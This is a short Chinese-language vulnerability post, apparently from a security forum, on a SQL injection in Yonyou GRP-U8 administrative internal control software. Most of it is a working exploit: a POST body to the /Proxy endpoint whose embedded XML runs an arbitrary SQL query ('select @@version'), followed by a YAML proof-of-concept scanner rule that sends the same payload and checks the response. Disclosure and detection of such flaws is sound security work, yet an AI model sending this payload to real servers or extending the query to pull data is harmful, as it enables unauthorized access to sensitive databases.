0x01 漏洞描述
用友 GRP-U8 行政事业内控管理软件存在 SQL 注入漏洞,攻击者可通过精心构造的 payload 进行 SQL 注入攻击,从而获取数据库敏感信息。
0x02 漏洞影响
用友 GRP-U8 行政事业内控管理软件。
0x03 漏洞复现
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select @@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
0x04 POC检测
params: []
name: 用友GRP U8 Proxy_SQL注入漏洞
set: {}
rules:
- method: POST
path: /Proxy
headers: {}
body: cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA
format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA
format="text">select @@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b"COLUMN1")
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
请登录后查看回复内容